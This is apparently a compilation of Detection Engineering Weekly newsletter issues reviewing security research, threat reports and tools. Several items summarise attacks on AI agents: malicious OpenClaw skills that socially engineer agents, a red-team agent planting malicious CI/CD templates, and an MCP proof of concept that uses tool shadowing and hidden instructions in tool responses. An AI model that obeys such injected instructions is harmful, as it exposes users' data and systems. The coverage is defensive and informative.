we need to deploy an army of OpenClaw agents to battle OpenClaw agents that are malicious or zombies

🔗 Open Source

Btlyons1/Detection-Engineering-Baseline

Link to Brandon Lyons’ modified Z-score lab, featured above in the Gem. Contains a Jupyter notebook to help readers follow along, as well as loads of synthetic data to try out the detections.


moltenbit/NotepadPlusPlus-Attack-Triage

PowerShell cmdlet to test whether you ran a compromised version of NotepadPlusPlus from their incident announcement last week. It checks known IOCs, so there’s no guarantee those IOCs are still relevant, or that a clean run means you weren’t compromised.


S1lkys/PhantomFS

This is a clever technique that abuses Windows ProjFS. ProjFS allows a process to project a virtual filesystem, which is how tools like OneDrive surface files hosted on a cloud provider. S1lkys built this so it projects an encrypted payload, like Mimikatz, when the requesting process comes from the command line, but not when it comes from EDR tools.


wardgate/wardgate

Wardgate is an Agentic proxy that stores secrets and API keys on your agent’s behalf. The idea here is that the Agent is aware it has API access to some external service, you have it use Wardgate, and Wardgate will serve as the API proxy. This is especially helpful if you are afraid of attacks on Agents that steal local or cached credentials.


praetorian-inc/augustus

Augustus is an LLM penetration testing harness that integrates with dozens of LLMs. It ships hundreds of attacks across 47 attack categories that you can let loose on models from the foundational labs, or on models you are training on top of them.


Received — 5 February 2026 Detection Engineering Weekly

DEW #144 - Pyramid of Permanence and 🦞OpenClaw 🦞 Security Dumpster Fires

4 February 2026 at 14:03

Welcome to Issue #144 of Detection Engineering Weekly!


✍️ Musings from the life of Zack:

  • I’m in beautiful New York City this week, and finally made the move to get a hotel away from Times Square. Best decision ever, even if you are in Manhattan, anywhere is quieter than Times Square

  • I got OpenClaw up and running, and made a Moltbook account with it. This issue is also heavy on OpenClaw security because it’s a dumpster fire

  • I flew to my hometown and it was colder than New England and New York. The jet bridge at our arrival gate was frozen to the ground, and they spent 30 mins trying to get it moving. We eventually moved to a different jet bridge

Sponsor: Adaptive Security

Stop Deepfake Phishing Before It Tricks Your Team

Today’s phishing attacks involve AI voices, videos, and deepfakes of executives.

Adaptive is the security awareness platform built to stop AI-powered social engineering.

Protect your team with:

  • AI-driven risk scoring that reveals what attackers can learn from public data

  • Deepfake attack simulations featuring your executives

Take a Free Self-Guided Tour


💎 Detection Engineering Gem 💎

TTPI’s: Extending the Classic Model by Andrew VanVleet

Tactics, Techniques & Procedures (TTPs) is a table-stakes term in our industry. It binds our understanding of attacker behavior into a common lexicon. Within this lexicon, MITRE ATT&CK reigns supreme, and they have some generally agreed-upon definitions within their ATT&CK FAQ. Basically, in order to understand MITRE ATT&CK, you have to understand their nomenclature of TTPs, where:

  • Tactics describe an adversarial objective, such as initial access

  • Techniques describe how an attacker can execute some operation to achieve that objective

  • Procedures describe the implementation details of a technique in a given environment

In this post, VanVleet challenges this model because the specific details of how an attack is carried out at the Procedure level can sometimes be vague. I think this is by design on MITRE’s part, because the procedure to achieve it can differ depending on the environmental context I mentioned earlier. He makes the analogy that Procedures are like a cake, not necessarily a recipe. He proposes the concept of Instance, which is the recipe itself, to achieve that procedure.

ATT&CK does get close to this via Detection Strategies. As an example, VanVleet looks at T1070.001, Indicator Removal: Clear Windows Event Logs. The MITRE page includes a description of how this can be achieved, but it seems high-level enough that some more detail on the recipe would be helpful. The detection strategy can provide more clues from an event-ID perspective, but without the technical implementation, it may be hard to recreate and test. Here’s his idea of what an Instance section could look like:

This could be helpful for detection engineers who want to recreate the attack in their own environment to test their telemetry generation and detection rules.

I’ve always had a hard time with the Pyramid of Pain for this exact reason. The “TTPs” part at the top of the Pyramid can encapsulate so much work, without any ability to reverse-engineer how the attack is captured. In fact, I’ve always thought TTPs/Tools should be combined, because almost every Procedure contains some level of tooling to capture the attack.

In the spirit of alliteration, and perhaps more as a thought exercise, he proposes the “Pyramid of Permanence”.

Basically, Procedures are what we want to capture, and everything below the tip of the Pyramid consists of Instances that support the procedure. It’s an interesting thought experiment, and as long as it serves as a lexicon to drive the conversation on better modeling, I’m all for it.


🔬 State of the Art

The story of the 5-minute-long endpoint by Leónidas Neftalí González Campos

This is more software engineering-related, but I sometimes come across blogs where I can see how security analysts and software engineers alike can commiserate about working in a bureaucracy. Campos is a software engineer working on a customer appointment management product, and a JIRA ticket came in reporting that a simple task of uploading customers started crashing on “large” uploads. They took the ticket, found a terrible pattern within their codebase that uploaded one user at a time, and deployed a fix in record time.

This is a story of how many bad small decisions and only shipping new features can lead to a monstrosity of an issue. My takeaway here for all my security readers is to challenge governance around your security operations, because optimizing decisions around a cool technology or an isolated problem can lead to a lot of heartache and burnout.


OpenClaw Observatory Report #1: Adversarial Agent Interaction & Defense Protocols by Udit Raj Akhouri

OpenClaw is the new hotness right now, and as expected, security researchers are running to poke holes in it, both from an architectural security perspective and, in this case, security agent efficacy. I thought this was a unique pentesting report, where Akhouri set up a red team/blue team exercise to test the blue team agent’s ability to prevent abuse of its Lethal Trifecta trust relationships. In the first scenario, the red team agent sends a “help” threat detection template to set up a CI/CD project for detection testing. Within that CI/CD pipeline, a malicious cURL command and a bash script would download a payload and infect the blue team. In the second scenario, they tried something similar with a JSON template injection payload.

OpenClaw caught the first attack and, according to Akhouri, analysis of the second attack by the blue team agent is still pending. I’m not too surprised that the blue team agent caught the first attack, but it goes to show how important it is to have emerging technologies and agent orchestration platforms undergo security testing to see how well they handle these scenarios.


Work travel means more podcasts, and it was great to dive back in with Jack Naglieri’s detection engineering-focused podcast, Detection at Scale. In this episode, Jack interviews Ryan Glynn from Compass and picks his brain on the use of LLMs in his day-to-day work as a staff security engineer.

I appreciated the grounding of the LLM hype Glynn makes and what works and doesn’t work. At the beginning of the episode, he makes a great point about using LLMs to make binary decisions as an investigation technique. Basically, it’s much easier to look at a yes versus a no for an alert investigation and challenge its assumptions than to try to solve a lot of components at once.

He also shared his experience evaluating AI SOC vendors and how hard it was to understand their efficacy. For example, when an AI SOC agent says whether an alert is benign or malicious, it’ll at times make up steps along the way that never happened.

Glynn’s phishing detection setup was super interesting. He compared and contrasted the agony of training ML models for phishing before the advent of LLMs, where you’d need to build various binary classification and entity extraction capabilities to arrive at a binary verdict. Now, you can still arrive at that binary feature with more traditional models, but use the LLM to generate the flag. It treats the LLM as a feature-extraction tool rather than a hegemonic security tool.


👊 Quick Hits

Precision & Recall in Detection Engineering by rootxover

It’s cool to see how others interpret the concepts of precision & recall within their own detection writing. In this post, RootXover covers the concepts in the context of detection engineering and provides an example of how to compute them in a phishing alert scenario. I liked their graph of the four “zones” of labels for detections:

  • Alert Storm: low precision, high recall

  • Detection Purgatory: low precision, low recall

  • Quiet but Risky: high precision, low recall

  • Dream Zone: high precision, high recall

I will say, it’s rare that I’ve ever seen the “Dream Zone” in my career. There’s a natural relationship between precision and recall where, in general, as one increases, the other decreases.
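The computation itself is two divisions. Here’s a quick sketch with made-up phishing numbers (not rootxover’s) showing how a rule lands in the “Alert Storm” zone:

```python
def precision_recall(tp, fp, fn):
    """precision = TP / (TP + FP); recall = TP / (TP + FN)."""
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    return precision, recall

# One month of a phishing rule: 40 real phish caught, 60 benign emails
# alerted on, 10 real phish missed entirely.
p, r = precision_recall(tp=40, fp=60, fn=10)
print(f"precision={p:.2f}, recall={r:.2f}")  # → precision=0.40, recall=0.80
```

Low precision with high recall: analysts drown in alerts, but little slips through — the Alert Storm zone from the post’s graph.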


Task Management for Agentic Coding by Jimmy Vo

Friend of the newsletter Jimmy Vo dives into Anthropic’s task management framework, formerly “to-dos” and now called “tasks”. This isn’t a cybersecurity post, but I think the content is important if you are starting to leverage Claude Code to manage task and todo lists. The obvious security example of using tasks is alert triage, but I think it’s important for any security person to have a system for managing how they do work. Jimmy uses gardening tasks as an example, and it was cool to see how Claude can create the tasks, build dependency graphs, and plan out whatever task he issues.


☣️ Threat Landscape

I’m back on my Three Buddy Problem listening sprees, and this one was SO good to listen to just for the commentary on the wiper attack against Poland. The gang dives deep into a Polish CERT report where a Russian APT targeted 30 wind and solar farms, as well as a power plant, and deployed a wiper to essentially shut them down. Of note, it was the dead of winter in December in Poland, and the resulting heat and power outage threatened nearly half a million people.

The key argument here is how reliance on Fortinet invites these attacks. These appliances are notoriously bad at preventing exploitation due to poor coding practices, and if you want additional security support, you have to pay for services, since Fortinet doesn’t allow forensic access to the devices.


Notepad++ Hijacked by State-Sponsored Hackers by Notepad++

Notepad++’s update servers were compromised from June 2025 to September 2025, according to the project. Chinese-nexus actors allegedly compromised Notepad++’s hosting provider, allowing them to redirect update traffic for downstream compromise. The specific language the blog author used was that the “Shared Hosting Server” was compromised, and it’s hard to say what the difference is between “shared” and their own hosting server.

Did the APT find a way onto the shared server, escalate privileges, and laterally move to Notepad++? Or is this just semantics about using a VPS, and was Notepad++ specifically targeted? I’d be much more interested in the technical details of the former.


No Place Like Home Network: Disrupting the World's Largest Residential Proxy Network by Google Threat Intelligence Group (GTIG)

GTIG disrupted and took down a massive residential proxy network, IPIDEA. Residential proxy networks are akin to what Google calls Operational Relay Boxes (ORBs), but with a specific commercial application: you can “rent” exit points from unaware victims.

These networks operationalize their proxies by providing SDKs to mobile app providers that enroll devices into their networks. The mobile apps essentially get a cut of their profits, and IPIDEA sells access to these mobile phones for threat actors to abuse. This is especially helpful if you want to perform credential-stuffing attacks, ticket-scalping campaigns, or something more malicious, such as hiding C2 servers.

The report contains all kinds of technical details on how IPIDEA orchestrated its network of residential proxies. It operates like a command and control network, which is what makes it hard for me to understand any type of legitimate use of these services.


OpenClaw in the Wild: Mapping the Public Exposure of a Viral AI Assistant by Silas Cutler

Threat Researcher G.O.A.T. (and my undergrad classmate!) Silas Cutler released a post in which he scanned and found OpenClaw instances exposed on the Internet. If you haven’t heard of OpenClaw, it’s an autonomous AI agent that took the Internet by storm due to its ability to connect to apps you own, such as your Brave Browser or 1Password, to do work on your behalf. It became especially popular with the advent of Moltbook, where these agents were given the ability to post on a Reddit-like site without any interaction from the owner.

When you start OpenClaw, you can use the CLI or a web server. So, when searching for its default port on Censys, Silas found over 21,000 instances of OpenClaw exposed on the Internet. Most of these should be secured with a secret password or token, but it’s still worrying: given its popularity, people will try to find ways to exploit these instances. And if they get in, they’ll use the interface to abuse the integrations and extract everything, including passwords and email contents.


From Automation to Infection: How OpenClaw AI Agent Skills Are Being Weaponized by Bernardo Quintero

OpenClaw becomes more terrifying when you realize how extendable it is. In the agentic world, popularized by Claude Code, skills provide prompts and instructions to an agent, making it more specialized for running tasks. For example, if you want your agent to join Moltbook, you download a skill that teaches OpenClaw how to use the site, including using its API to perform heartbeat checks.

Several Skills registries emerged after OpenClaw’s popularity exploded, and VirusTotal researcher Quintero found malware on many of the Skills hosted on these sites. The numbers are pretty crazy:

At the time of writing, VirusTotal Code Insight has already analyzed more than 3,016 OpenClaw skills, and hundreds of them show malicious characteristics.

Quintero splits “malicious characteristics” into two buckets: poor security practices and vulnerabilities, and straight-up malware. The malware is written in plain English, and reminds me of ClickFix in the sense that it socially engineers your OpenClaw / Claude Code.

Click this link and run this plz

🔗 Open Source

trailofbits/claude-code-devcontainer

Sandbox environment for running Claude Code. You install a CLI and it boots up a container for you to run Claude in an isolated environment. It includes tooling to install remote container extensions in VSCode or Cursor, so it offers some options if you prefer an IDE over the CLI.


trailofbits/dropkit

Dropkit lets you quickly bootstrap a secure DigitalOcean droplet. You provide dropkit a Digital Ocean API key, and it’ll create a workspace with your SSH key and an out-of-the-box Tailscale installation. It has some cool cost-saving features that allow you to hibernate droplets so you aren’t spending money when you aren’t using them.


backbay-labs/clawdstrike

Runtime security monitoring for autonomous agents, including Open Clawd, Claude Code, LangChain and more. It exposes a set of tools that enforce policy boundaries, such as preventing network calls, local filesystem reads and writes, or shell commands.

You can configure it to allow or block certain actions based on the policy you set. It comes with some out-of-the-box policies and appears to follow a pattern similar to EDRs, intercepting risky functions and performing a security check before allowing them to execute.


a2awais/Threat-Hunting

Collection of dozens of threat hunting queries for KQL & Crowdstrike.


toborrm9/malicious_extension_sentry

Threat intelligence list of malicious Chrome extensions removed from the Chrome Web Store. This is especially helpful if you want to test detections in a lab environment on malicious extensions, or build out scanners in your environment to see if you can find net new ones.


Received — 29 January 2026 Detection Engineering Weekly

DEW #143 - Suppressing False Positives at Scale, Silencing EDRs & Detection Fidelity via Social Network Analysis

28 January 2026 at 14:04

Welcome to Issue #143 of Detection Engineering Weekly!


✍️ Musings from the life of Zack:

  • New England got hit hard by a snowstorm, and my town alone recorded over 20 inches/50 cm of snow!

  • I got COVID for the third time in the last 6 years. It definitely was milder, but I can still feel the shortness of breath that I vividly remember from the earlier and more potent strains

  • If you have 30 mins, check out the blog about Gas Town. It’s written like someone who’s running through an Agentic fever dream, and they managed to wake up with an insane orchestration system that makes you run out of Claude credits in 3 minutes

Sponsor: Permiso Security

ITDR Playbook: Detect & Respond to Non-Human Identity Compromise

Non-human identities are everywhere, and when they’re compromised, attackers blend in as “normal” automation. This ITDR Playbook focuses on detecting and responding to NHI compromise using operational anomalies, not login patterns. Learn how to spot exposed keys, boundary violations, privilege creep, and abnormal service behavior. Plus, get response steps that will contain risk without breaking production.

Download The Playbook


💎 Detection Engineering Gem 💎

Centralized Suppression Management for Detections Using Macros & Lookups by Harrison Pomeroy

Detection rule efficacy is the practice of curating rule sets that balance precision, recall, and the cost of triage. New detection engineers typically think rules are the only place you can apply logic to help manage this balance. A more precise query that accounts for benign behaviors, given the tactic or technique, can increase the likelihood of capturing true positives. But there are other capabilities in SIEM technologies and software engineering practices that can filter and suppress alerts in more dynamic, context-aware ways that align with the threat landscape or your environment.

This post by Harrison Pomeroy details the power of Splunk’s macro and lookup table functionality to suppress alerts without re-deploying rules. A suppression is a capability detection engineers deploy to dynamically mute alerts, reducing both the cost of false-positive generation and the need to re-tune a rule over small field changes. It also makes the rule more resilient, because it can account for external factors related to benign behaviors, such as known service accounts, scheduled tasks, or internal tooling.

Harrison leverages Splunk’s macro and lookup table features to achieve this.

The above Mermaid diagram shows his really clever setup. When you apply macros to each of your Splunk rules, you can bring in logic that evaluates whether suppressions are enabled for the rule (the T value), then consult a lookup table for additional logic to append to your original rule to suppress false positives.

The above example suppresses alerting on any user called svc_backup. The macro executes based on the T value and performs a lookup in a table tied to the PShell Alert rule. Because svc_backup is in the table, a NOT() filter prevents an alert when svc_backup is present. The green “suppressed” box shows the alert not firing, and the red “Alert” box fires because the user is jsmith.
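Here’s the shape of that query-time logic, sketched in Python rather than SPL, since the exact macro syntax lives in Pomeroy’s post. The table contents mirror his svc_backup example; the rule and field names are illustrative:

```python
# Suppression lookup table: rule id -> enabled flag plus suppressed values.
SUPPRESSIONS = {
    "pshell_alert": {"enabled": True, "users": {"svc_backup"}},
}

def should_alert(rule_id, event):
    entry = SUPPRESSIONS.get(rule_id)
    if entry is None or not entry["enabled"]:  # the macro's "T value" check
        return True                            # no suppression: alert as usual
    # The NOT() filter: drop the alert when the user is in the lookup table.
    return event["user"] not in entry["users"]

print(should_alert("pshell_alert", {"user": "svc_backup"}))  # → False (suppressed)
print(should_alert("pshell_alert", {"user": "jsmith"}))      # → True (alert fires)
```

Tuning becomes a lookup-table edit — svc_backup goes in or out — with no rule re-deploy.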

This type of suppression occurs at query time, before the alert is generated. There are other suppressions you can apply before a log hits the index, or after the alert fires. This is a great topic for my Field Manual series, so thank you, Harrison, for the inspiration!


🔬 State of the Art

EDR Silencing by Pentest Laboratories

EDR Silencing has been a super interesting area of research for security operations and threat actors alike. Typically, when a threat actor lands on a victim box and sees an EDR process running, their top priority is finding a way to evade the EDR to avoid detection. They can employ several techniques, such as:

  • Avoiding EDR detection rules themselves, such as abusing indirect syscalls that EDRs have not accounted for, or using living-off-the-land binaries

  • Obtaining privileged access and installing kernel modules that circumvent EDR hooking logic, so malicious activity never generates telemetry

  • Uninstalling (!) the EDR

The last bullet above is the most interesting, because it’s so simple. It makes me think of the adage “don’t let perfect be the enemy of good”. EDR Silencing abuses the same simple-but-effective concept: it disrupts the network connection between the EDR cloud service and the agent. Severing this connection hamstrings the effectiveness of the EDR without requiring any evasion of detection logic.

In this post, Pentest Laboratories provides readers with a fantastic survey of the state of the art of EDR Silencing. A huge part of this research relies on obtaining Local Administrator privileges to leverage everything from Windows Filtering Platform APIs to adding blocking entries in local DNS configuration files.


The End of the “Write & Pray” Era in SIEM: Detection as Code and Purple Team Validation by Ali Sefer

This is a clever introduction to the concept of detection-as-code through the lens of Sefer, a SOC Manager. I enjoyed the framing around moving from the “Craftsmanship” era of rule writing to the “Engineering” era. Detection engineers, at their core, should be part security expert, part data analyst, and part software engineer. This is especially true in Sefer’s day-to-day, where they’ve dealt with analysts who read a threat intelligence report, implement a rule in the SIEM, deploy it, and never test it.

This really is a post about detection rule governance. It’s important that we implement the boring stuff for detection rules, for the sake of managing costs. If an analyst or detection engineer deploys rules without careful validation, education, version control and testing, then operations teams run a huge risk of false positives and analyst burnout. Sefer brings the reader through an example automated test pipeline, where:

  • Analysts write rules

  • Rules are checked into version control with syntax validation and linting

  • Atomic Red Team tests run to validate that the telemetry matches the rule

  • The rule is deployed to the SIEM

  • Feedback mechanisms are instilled to tune the rule
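The validation step in such a pipeline can be as simple as a schema check that runs in CI before anything ships. A toy linter in Python (the required fields and rule shape here are illustrative, not Sefer’s actual schema):

```python
# Toy linter for a detection rule expressed as a dict (e.g. parsed from YAML).
# A real pipeline would run this in CI before the Atomic Red Team stage.

REQUIRED_FIELDS = {"title", "logsource", "detection", "level"}

def lint_rule(rule: dict) -> list[str]:
    """Return a list of lint errors; an empty list means the rule passes."""
    errors = [f"missing field: {f}" for f in sorted(REQUIRED_FIELDS - rule.keys())]
    if rule.get("level") not in {"low", "medium", "high", "critical", None}:
        errors.append(f"invalid level: {rule['level']!r}")
    return errors
```

A failing lint blocks the merge, which is exactly the “boring stuff” that keeps untested rules out of production.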

Sefer ends the blog with a real-world example where an analyst tuned a rule and the logic failed the Atomic Red Team validation check. The cool thing here is that the failure had nothing to do with the detection rule, but with the health of the system itself. Catching log source misconfigurations and reconciling them with detection logic is just as useful as rule validation itself.


Detection Fidelity & Confidence Framework: Teaching Your SIEM to Score Its Own Homework by Hatim Bakkali

But here’s what I’ve noticed after staring at years of notable event data: detections don’t fire in isolation. They have patterns. They have Friends. And those Friendships tell us something important about fidelity and confidence.

This post is a deep dive into a new framework for measuring detection fidelity and confidence. Rule efficacy is like a garden; it requires constant curation and mindfulness of how you build and maintain detection rules. Bakkali’s approach is more math-heavy and academic but built from practical experience. The concept is around measuring the co-occurrence of alerts with other alerts, similar to how social networks create edges between friends and followers for suggestions.

The scoring binds to an entity, much like Risk-Based Alerting (RBA), and Bakkali says it should complement RBA rather than replace it. Their framework calculates two scores: confidence and fidelity.

  • Confidence: scores pairs of alerts based on how often they co-occur within a time window

  • Fidelity: aggregates those pair scores to a detection-level “noise accumulation” score. The lower, the better
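A rough Python rendering of the two scores for a single entity (the window size and counting scheme here are my assumptions, not Bakkali’s exact formulas):

```python
from collections import defaultdict
from itertools import combinations

def cooccurrence_confidence(alerts, window=300):
    """alerts: list of (timestamp, detection_name) tuples for ONE entity.
    Returns {frozenset({a, b}): count of co-occurrences within `window` seconds}."""
    pair_counts = defaultdict(int)
    for (t1, a), (t2, b) in combinations(sorted(alerts), 2):
        if a != b and t2 - t1 <= window:
            pair_counts[frozenset((a, b))] += 1
    return dict(pair_counts)

def fidelity(detection, pair_counts):
    """Aggregate pair counts into a per-detection 'noise accumulation' score.
    Lower is better: a detection that co-fires with many others scores high."""
    return sum(c for pair, c in pair_counts.items() if detection in pair)
```

The bake-in period the post describes would be spent accumulating these counts until the pair scores stabilize.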

They provide a ton of examples and walkthroughs, along with SIEM-agnostic pseudocode, for readers to try themselves. There’s a bake-in period to measure these over time before you can start using them, but it’s a clever approach for a few reasons.

First, it’s an elegant addition to RBA because it still technically groups by an entity, but it examines pairs of alerts rather than simple aggregates. This leads to my second point: any expert model that applies arbitrary scoring mechanisms to alerts runs the risk of poor model validation. You need to redeploy these models every time you update your scores, which can swing results profoundly and create more work. That risk exists here too, but the approach tends to preserve the relationships between pairings, making changes easier to understand.


Introducing IDE-SHEPHERD: Your shield against threat actors lurking in your IDE by Tesnim Hamdouni

~ Note: I work at Datadog, and Tesnim is my colleague ~ I’m super excited to post this because it was Tesnim’s internship project, and she now works at Datadog and is releasing it to the world! IDE-SHEPHERD is an IDE extension that helps prevent malicious extension installation, an emerging attack vector over the last year. The cool part of this extension is that it generates telemetry from the extension manifest for reporting and threat hunting, in addition to runtime monitoring.

It has runtime and heuristic detection capabilities. At runtime, it’ll shim Node functions that attempt to spawn processes, detect and block malicious commands, and perform network monitoring. The heuristic functionality analyzes metadata related to extensions and checks for poor developer practices, metadata anomalies, and hidden commands.
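IDE-SHEPHERD’s shims live in Node, but the same guard pattern translates to Python: wrap the process-spawn API and deny-list suspicious commands. This is an analogy I wrote to illustrate the technique, not the extension’s actual code:

```python
import subprocess

# Hypothetical deny-list of binaries we don't expect an extension to spawn.
DENYLIST = ("curl", "wget", "nc", "base64")

_original_popen = subprocess.Popen

def guarded_popen(args, *pargs, **kwargs):
    """Shim for subprocess.Popen that blocks deny-listed commands."""
    cmd = args[0] if isinstance(args, (list, tuple)) else str(args).split()[0]
    if any(cmd.endswith(bad) for bad in DENYLIST):
        raise PermissionError(f"blocked suspicious spawn: {cmd}")
    return _original_popen(args, *pargs, **kwargs)

subprocess.Popen = guarded_popen  # install the shim
```

The real extension does this at the Node layer, where it can also emit telemetry about every blocked spawn for hunting.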


From Static Template to Dynamic Forge: Bringing the DCG420 Standard to Life for the Detectioniers by DCG420

DCG420, who wrote and released the Detection Engineering Template, has just launched a platform that serves as a workbench for detection engineers. It has an AI backend to help visualize attack flows, measure coverage, and write rules. The intel analyst within me got really excited reading about their Analysis of Competing Hypotheses feature, which combines their tool and LLMs to generate competing hypotheses against your detection rule candidate. This helps check for bias and catch detection engineers who may be stuck in a rabbit hole, pushing a rule out without considering other options.


The Indirect Realism of Threat Research by Amitai Cohen

This is an excellent commentary by Amitai on information asymmetry in threat research. We tend to (rightly) dunk on large cybersecurity companies as they create, update, and hype their lexicons of APT and cybercriminal names. But the very good ones do this for a reason: they have a lens through which they see threat activity, and they group it within that unique lens because no one else has the visibility they do.

This bias is ever-present in security operations and detection engineering, where, according to Cohen, we become convinced that what we can measure captures what threat actors generate. By checking this bias, acknowledging that information asymmetry exists, and obsessing over what you might be missing, you can be more confident that you are addressing gaps on an ongoing basis.

☣️ Threat Landscape

Who Operates the Badbox 2.0 Botnet? by Brian Krebs

In the latest saga of the Kimwolf botnet, it looks like the botnet's operators broke into a rival Chinese-nexus family dubbed Badbox 2.0. The admins of Kimwolf, “Dort” and “Snow”, managed to post a screenshot of the crew taking over a control panel that manages and deploys Badbox. The evolution of these botnets has recently moved away from traditional DDoS-style attacks to operating and selling access to residential proxy networks.

Krebs managed to pull an email address from the “proof” screenshot and worked his way into finding an identity. Email re-use and operational security still seem to be issues for threat actors, and it shows how one screenshot can pull the attribution thread all the way to a full identity.


A Shared Arsenal: Identifying Common TTPs Across RATs by Nasreddine Bencherchali & Teoderick Contreras

This research by Splunk’s threat research team surveys 18 infostealer malware families mapped to MITRE ATT&CK TTPs. These families tend to emerge from criminal groups splitting, source code getting sold and leaked, and operators talking to each other on criminal forums.

The interesting finding here is how 6 out of the 18 malware strains leverage legitimate services for their command & control infrastructure. So it’s not the worst detection opportunity to alert on anomalous traffic heading to places like GitHub, social networks, Discord, or Steam.
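One way to act on that detection opportunity is to baseline which processes normally talk to those services and flag deviations. A toy sketch (the process and domain lists below are invented for illustration):

```python
# Legitimate services commonly abused for C2, per the Splunk research theme.
LEGIT_C2_DOMAINS = {"github.com", "discord.com", "steamcommunity.com", "t.me"}

# Hypothetical baseline of processes expected to contact each service
# in your environment; anything else is worth a look.
BASELINE = {
    "github.com": {"git", "gh", "code"},
    "discord.com": {"Discord"},
}

def anomalous(process: str, domain: str) -> bool:
    """Flag traffic to abusable legitimate services from unexpected processes."""
    if domain not in LEGIT_C2_DOMAINS:
        return False
    return process not in BASELINE.get(domain, set())
```

The baseline is the hard part in practice; the rule itself is just a set lookup.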


OpenSSL 3.6 Security Release: 10 Vulnerabilities by OpenSSL

OpenSSL had a fairly large security release with around 10 vulnerabilities disclosed. One vulnerability with a “High” severity rating, CVE-2025-15467, caught my eye because its title leads with a stack-based buffer overflow. These can theoretically lead to remote code execution, and since OpenSSL is a security technology that underpins the Internet, I thought it was worth calling out.


Kubernetes Remote Code Execution Via Nodes/Proxy GET Permission by Graham Helton

This is a super interesting vulnerability writeup where the (mis)configuration was known for a long time, but a new nuance made it much worse. Basically, Helton found a valid Kubernetes configuration that allowed authenticated attackers to access an API that serves as a “catch-all” and proxies potentially dangerous requests to the Kubelet API, the internal API exposed by the agent running on each node.

By using a WebSocket connection to nodes/proxy with the GET verb, Kubernetes proxies the request to the Kubelet API without respecting the internal configuration that only allows the CREATE verb for the exec command, enabling remote code execution. Helton discovered 69 Helm charts from well-known vendors using this configuration. The best part? There is no audit logging you can use to detect this!

Here’s the relevant snippet from Helton’s blog:

This should mean consistent behavior: a POST request maps to the RBAC CREATE verb, and a GET request maps to the RBAC GET verb. However, when the Kubelet’s /exec endpoint is accessed via a non-HTTP communication protocol such as WebSockets (which, per the RFC, requires an HTTP GET during the initial handshake), the Kubelet makes authorization decisions based on that initial GET, not the command execution operation that follows. The result is that nodes/proxy GET incorrectly permits command execution that should require nodes/proxy CREATE.


🔗 Open Source

DataDog/IDE-Shepherd-extension

IDE extension from Tesnim’s research listed above in State of the Art.


zencefilefendi/satguard

Satguard is a Starlink telemetry detection & analysis framework for detecting and visualizing satellite attacks. You feed it Starlink debug logs, and it uses a combination of static rules and anomaly detection to detect spoofing and jamming attacks and measure signal health.


FinkTech/mcp-security

Security rules and best practices for defending MCP servers. It’s structured super well, and has markdown reports with detailed examples, compliance mappings, example vulnerable and secure code and references. Would be great to feed this into an LLM and check for vulnerabilities as people push code to an MCP server repository.


thpeng/lokis-mcp

PoC MCP server that demonstrates how a malicious MCP server can hijack your local LLM CLI to perform four separate attacks:

  • Tool shadowing: convinces your local LLM that it is the preferred tool, and performs prompt injection to take advantage of queries and responses

  • Data exfiltration: hijacks a prompt and exfiltrates it over the tool for further analysis

  • Response injection: injects “hidden instructions” in other tool responses to manipulate behavior

  • Context window flooding: DDoSes the context window of the prompt, which can render models with smaller context windows unresponsive


aserper/rtfd

Local MCP server that exposes tools to connect to API documentation across GitHub, npm, GoDocs and several others. This is helpful if you want to run agents locally and don’t want them hallucinating strategies that don’t match the documentation, or you want them to use the most up-to-date documentation without searching the Internet.

Every week, I read, watch and listen to all the Detection Engineering content so you can consume it all in 10 minutes. Subscribe and get a weekly digest of the latest and greatest in threat detection engineering!

Received — 21 January 2026 Detection Engineering Weekly

DEW #142 - Slack's Agentic Triage Architecture, Detection <3's Data and Sigma evals

21 January 2026 at 13:54

Welcome to Issue #142 of Detection Engineering Weekly!


✍️ Musings from the life of Zack:

  • I’m not usually a person who does New Year’s resolutions, but I’ve committed to small changes that have already made a positive impact in my life.

    • Using a notebook to take notes and to-dos at work

    • Meditating on Headspace four days a week

    • Playing video games twice a week. For some reason, I’m back on Dota2 so I’m sure that’ll be helpful for my mental health

  • There’s a 50/50 chance I’ll make DistrictCon this weekend :( There’s a massive snowstorm hitting Washington, D.C., and as a former Marylander, I can tell you that part of the country cannot handle snow

  • I’ve been messing with local MCP server development via stdio and HTTP APIs, and I’m starting to shill Claude Code to everyone I talk to. It ripped through a malware analysis at work a week or so ago, and we were able to hunt for IOCs in under 5 minutes.


💎 Detection Engineering Gem 💎

Streamlining Security Investigations with Agents by Dominic Marks

In the age of AI SOCs, it’s still hard to understand where agentic triage fits into everyday operations. Products tend to present the problem set and solutions in a clean, understandable way. This is a good thing - a product company framing the space in clear, concise benefits and downsides helps security operations teams decide how much cost to incur in building or buying one.

Blogs like this show why our industry’s transparency is awesome. Slack's security operations team published its work on building an in-house agent-based triage system. You see many of the same principles and concepts across products, but because there is no moat or trade secrets to protect, there’s a lot more to dig into.

What you see above is their approach to their agent-to-agent orchestration system. The top of the pyramid starts with a director who leverages high-cost models: thinking models that tend to take their time and deliberate on prompts and results. This makes sense from a planning and analysis perspective.

The critic focuses on interrogating individual analyses from telemetry and alerts. It doesn’t require as much model cost, but it should spend a reasonable amount of time challenging assumptions and reviewing the lower-cost model’s output, then present the amalgamation of data and investigative output back to the director. The Director likely runs thinking-mode models, where you spend the most money on tokens to judge whether the lower parts of the pyramid performed their jobs correctly. This is the gate between a human and the system, so you only want high-quality analysis moving forward.

The phase transition diagram is super interesting because it puts the above “Director Poses Question..” investigation step into practice.

According to Marks, the Director makes decisions for each part of the phase to see whether it needs to close the investigation or continue it further. The “trace” component is where the Director engages an expert within their architecture to perform additional investigative analyses.

Honestly, it’s hard for me to provide my own analysis here, because the blog is just so complete. So, if you are a person who is skeptical of these types of setups, borrow or steal ideas from this Slack blog and try it on your own. It seems reasonable: if you perform 5 investigations that take 2 hours each, and the system reduces 3 of them from 2 hours to 10 minutes while catastrophically failing on the other 2, you still saved five and a half hours!


🔬 State of the Art

Data and Detect by Matthew Stevens

This post by Stevens dives deeper into the concept of detection observability. In our field, we tend to focus on the research element of rules and detection opportunities, but spend far less time on data quality. Remember: there is no rule without telemetry, and Stevens points out a concept around data usefulness that I think demonstrates this point perfectly.

Not all sources are the same when it comes to individual, atomic qualities for alerting, but when you map them to techniques, you notice that the composite qualities (the sum of many data sources finding an attack chain) become crucial. The graph above, generated by Stevens, shows how important Process Monitoring is for data usefulness. In fact, without Process Monitoring, you lose close to 30% of the techniques you can combine with other data types to alert on.
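The composite-quality idea is easy to demonstrate with a toy coverage calculation. The data-source-to-technique mapping below is invented for illustration (Stevens derives the roughly 30% figure from real mappings):

```python
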